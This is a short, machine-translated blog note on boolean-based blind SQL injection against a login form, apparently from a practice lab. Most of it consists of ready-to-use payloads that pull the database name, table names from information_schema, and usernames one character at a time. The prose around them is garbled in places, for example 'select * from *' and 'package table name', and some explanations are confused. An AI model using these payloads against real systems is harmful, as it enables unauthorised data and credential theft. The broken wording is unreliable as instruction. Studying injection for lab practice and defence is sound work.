1. Various judgments were made, and no mistakes were made. Use the universal statement to log in successfully.
2. There is no echo, so make a blind note based on Boolean value
. 3. It is wrong to use or password. So use or is similar to the principle of 1=1
Syntax :
report database
1, uname=111' or(select ascii(substr(database(),1,1))>100)#&passwd=&submit=Submit
package table name:
( select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1)
3 is to guess the field:
select * from *
uname=1' or (select ascii(substr((select username from users limit 0,1),1,1) )<100)#&passwd=&submit=Submit
on the importance of linit 0,1.
# limit 0,1, start from the 0th data in your table, only read one;
sql injection boolean based blind injection
Guess you like
Origin http://10.200.1.11:23101/article/api/json?id=326710968&siteId=291194637
Recommended
Ranking